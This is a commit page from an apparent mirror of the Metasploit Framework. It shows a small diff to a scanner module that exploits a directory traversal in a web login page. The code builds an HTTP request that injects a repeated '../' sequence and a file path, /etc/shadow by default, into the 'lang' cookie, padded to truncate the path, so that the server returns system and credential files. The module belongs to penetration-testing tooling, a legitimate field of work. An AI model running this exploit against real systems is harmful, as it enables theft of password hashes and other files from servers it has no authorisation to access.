infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Make msftidy happy and change the traversal option

unstable
sinn3r 2012-07-06 01:10:39 -05:00
parent 3b7e1cd73a
commit 0c18662d46
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/auxiliary/scanner/http/wangkongbao_traversal.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
[ [
Opt::RPORT(85), Opt::RPORT(85),
OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']), OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']),
OptString.new('DIRTRAVS', [true, 'Traversal depth', '../../../../../../../../../..']) OptInt.new('DEPTH', [true, 'Traversal depth', 10])
], self.class) ], self.class)
end end
@ -49,6 +49,8 @@ class Metasploit3 < Msf::Auxiliary
return return
end end
travs = "../" * datastore['DEPTH']
# Create request # Create request
path = "/src/acloglogin.php" path = "/src/acloglogin.php"
res = send_request_raw({ res = send_request_raw({
@ -58,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
{ {
'Connection' => "keep-alive", 'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate", 'Accept-Encoding' => "zip,deflate",
'Cookie' => "PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned" + datastore['DIRTRAVS'] + datastore['FILEPATH'] + "/."*4043 'Cookie' => "PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned" + travs + datastore['FILEPATH'] + "/."*4043
}, },
}, 25) }, 25)